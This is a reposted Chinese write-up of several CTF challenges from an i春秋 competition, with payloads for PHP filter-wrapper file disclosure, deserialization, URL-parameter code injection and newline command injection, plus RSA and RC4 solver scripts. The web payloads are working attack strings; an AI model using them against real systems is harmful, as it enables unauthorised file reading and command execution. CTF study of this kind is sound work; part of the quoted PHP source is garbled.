i春秋“网络内生安全试验场”CTF答题夺旗赛(第四季)部分题目WP
发布日期:2021-07-01 00:01:59
浏览次数:2
分类:技术文章
本文共 8312 字,大约阅读时间需要 27 分钟。
1.nani
构造payload,拿到user.php源码:http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php
warn); } function __wakeup(){ foreach(get_object_vars($this) as $k => $v) { $this->$k = null; } }}$cmd = $_POST[cmd];unserialize($cmd);?>
很明显,是一个反序列化的题,于是构造payload为:
flag就在txt文件中。2.XImg
用Stegsolve.jar打开图片,lsb查看可以拿到flag:
3.random
构造payload:http://120.55.43.255:27189/?seed=1555236291&key=895547922&hello=);print_r(file(%22./flag.php%22));//
可拿到flag。4.rsa
import gmpy2e=65537n=444511907374811621333864968430251419855347882081695888904531795366857517417289716213363408137550866409163408633679685635315881237914815762134949770798439327373469286675370381115822381092997433491238495970527484356127131132345893007368069814286822931047915482947544230741924674880304607902413527794657556174021361113759962742306966643629644800759209829893438222447478882663573891473386520138017997195362559918730232709719486847337248425121547893862458228964360472119045154255446606447184782930767120924229261090464514045697735201016333117579385787597262783543886217220299959364476125167328883418109849139384318692440116746717156025869399990008034002881758452936213924306428955442475834311604905905260723607788504332389824348292286402781474054375184928462870240017012586229806658850881803134678565293180207556731290044948846308165695896369703720482941116135445836684836990286418102640883844706122407701782360072256987197118468391662366105964629786899281484884877640733549203394680006068637251717623691598753570260479050407069262236583726905151495550801274277155039839844872050380772537409714164680083539118124646217833871816488578092001365486400242215564766336041803413006183310354910820598373905617564797817421231716827155927723376783dp=20688083194401098183398626094352469308150523583583104270723199988926694776131531953207031668652408481119466919329893607763657623952024909876740067584191851505244658377465365020503008072292716279306615911408934182303357474341329766407852983275790499225322862499664901633190925232802162977135254216707834894816730529759991634343322039528413883937752397011466779521590767711786777317159161700645318091278528395252576086979838790917201179739657819356771788743301669430631157222234922010934163688512789947321007479617996170289230676037655762865962020063056831019134814970048718940037920888121806608032574204482673114726401c=378245912689862819668716257795108255336928883693984263805908702337591160408234974716356292413190786704878880742998101926728409825216339197208512929079484687018187263522243781958701468849915372674337274640196043362477406890622345686503512151501592397926764442945655423801602100185867239106836704835215686246083812117439685990637352246191517010645343417283169123105697782747026231044064639955374854873089604766677942725374108213749982052985866259433900255218180285975477045323647923881322428349632056484406017564586481848442834247385904402824072352354677823823078646874632195128328299942128116508251564811923564362991466660005438580449558184197006623490303413636461137434703925564785299335803341222051570131842042120923719184091689629809380828306649702440460761848154682611972768099340896995546188526274235118488618951865589050087434162728116205149188555273127955536588551565951618535230908129965250151258048934985977493740897420718340268536363763127676899114219828753570040978640121185354431884041597851910784347040946251752577201426797684912671641470307249794269755972278013107831885544781029384256069586713714201822683071958299038410102821213570933652719191413490563464823296852894960994148922867149263897530215474500564443133161527for x in range(1,e): if (dp*e-1)%x == 0: p = (dp*e-1)/x + 1 if n%p==0: q = n / p phi =(p - 1) * (q - 1) d = int(gmpy2.invert(e,phi)) m = pow(c,d,n) s = str(hex(m))[2:] s = s[0:len(s)-1] flag = s.decode('hex') print flag break
执行上述python代码可拿到flag。
5.admin
构造payload:
import requestsr = requests.post('http://120.55.43.255:28119/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/convert.base64-encode/resource=fffffflag.php";}',data='admin').contentprint r
拿到一串base64,解码可得flag。
6.ping
构造payload:http://120.55.43.255:21173/ping.php?ip=127.0.0.1%0Als
flag就在txt文件中。7.apk123
反编译apk,可知是RC4加密算法,用java代码编写RC4算法,解密可得flag.
import java.io.UnsupportedEncodingException;public class RC4Util { /** * RC4加密,将加密后的数据进行哈希 * @param data 需要加密的数据 * @param key 加密密钥 * @param chartSet 编码方式 * @return 返回加密后的数据 * @throws UnsupportedEncodingException */ public static String encryRC4String(String data, String key, String chartSet) throws UnsupportedEncodingException { if (data == null || key == null) { return null; } return bytesToHex(encryRC4Byte(data, key, chartSet)); } /** * RC4加密,将加密后的字节数据 * @param data 需要加密的数据 * @param key 加密密钥 * @param chartSet 编码方式 * @return 返回加密后的数据 * @throws UnsupportedEncodingException */ public static byte[] encryRC4Byte(String data, String key, String chartSet) throws UnsupportedEncodingException { if (data == null || key == null) { return null; } if (chartSet == null || chartSet.isEmpty()) { byte bData[] = data.getBytes(); return RC4Base(bData, key); } else { byte bData[] = data.getBytes(chartSet); return RC4Base(bData, key); } } /** * RC4解密 * @param data 需要解密的数据 * @param key 加密密钥 * @param chartSet 编码方式 * @return 返回解密后的数据 * @throws UnsupportedEncodingException */ public static String decryRC4(String data, String key,String chartSet) throws UnsupportedEncodingException { if (data == null || key == null) { return null; } return new String(RC4Base(hexToByte(data), key),chartSet); } /** * RC4加密初始化密钥 * @param aKey * @return */ private static byte[] initKey(String aKey) { byte[] bkey = aKey.getBytes(); byte state[] = new byte[256]; for (int i = 0; i < 256; i++) { state[i] = (byte) i; } int index1 = 0; int index2 = 0; if (bkey.length == 0) { return null; } for (int i = 0; i < 256; i++) { index2 = ((bkey[index1] & 0xff) + (state[i] & 0xff) + index2) & 0xff; byte tmp = state[i]; state[i] = state[index2]; state[index2] = tmp; index1 = (index1 + 1) % bkey.length; } return state; } /** * 字节数组转十六进制 * @param bytes * @return */ public static String bytesToHex(byte[] bytes) { StringBuffer sb = new StringBuffer(); for(int i = 0; i < bytes.length; i++) { String hex = Integer.toHexString(bytes[i] & 0xFF); if(hex.length() < 2){ sb.append(0); } sb.append(hex); } return sb.toString(); } /** * 十六进制转字节数组 * @param src * @return */ public static byte[] hexToByte(String inHex){ int hexlen = inHex.length(); byte[] result; if (hexlen % 2 == 1){ hexlen++; result = new byte[(hexlen/2)]; inHex="0"+inHex; }else { result = new byte[(hexlen/2)]; } int j=0; for (int i = 0; i < hexlen; i+=2){ result[j]=(byte)Integer.parseInt(inHex.substring(i,i+2),16); j++; } return result; } /** * RC4解密 * @param input * @param mKkey * @return */ private static byte[] RC4Base(byte[] input, String mKkey) { int x = 0; int y = 0; byte key[] = initKey(mKkey); int xorIndex; byte[] result = new byte[input.length]; for (int i = 0; i < input.length; i++) { x = (x + 1) & 0xff; y = ((key[x] & 0xff) + y) & 0xff; byte tmp = key[x]; key[x] = key[y]; key[y] = tmp; xorIndex = ((key[x] & 0xff) + (key[y] & 0xff)) & 0xff; result[i] = (byte) (input[i] ^ key[xorIndex]); } return result; } public static void main(String[] args) throws Exception{ System.out.println(decryRC4("52aedea36a3c058b38aa32e625889947db302a6d1defdabf413085abf611487bf445e85108327a867c27","Flag{This_Not_Flag}","UTF-8")); }}
转载地址:https://lynnlovemin.blog.csdn.net/article/details/103734447 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!
发表评论
最新留言
感谢大佬
[***.8.128.20]2024年04月20日 00时59分24秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
how2heap-double free
2019-04-30
how2heap-fastbin_dup_consolidate
2021-07-03
tf keras SimpleRNN源码解析
2019-04-30
MyBatisPlus简单入门(SpringBoot)
2019-04-30
攻防世界web进阶区web2详解
2019-04-30
xss-labs详解(上)1-10
2019-04-30
xss-labs详解(下)11-20
2019-04-30
攻防世界web进阶区ics-04详解
2019-04-30
sql注入总结学习
2019-04-30
Python 之 histogram直方图
2019-04-30
Python实现决策树 Desision Tree & 可视化
2019-04-30
决策树 Decision tree
2019-04-30
MATLAB与CUDA
2019-04-30
Linux png转jpg (convert命令)
2019-04-30
Ubuntu更新后终端中字体的颜色全是白色
2019-04-30
vscode git
2019-04-30
基于MATLAB的二进制数字调制与解调信号的仿真——2PSK
2019-04-30
基于MATLAB的模拟调制信号与解调的仿真——DSB
2019-04-30
HDU - 1166 敌兵布阵 (树状数组模板题/线段树模板题)
2019-04-30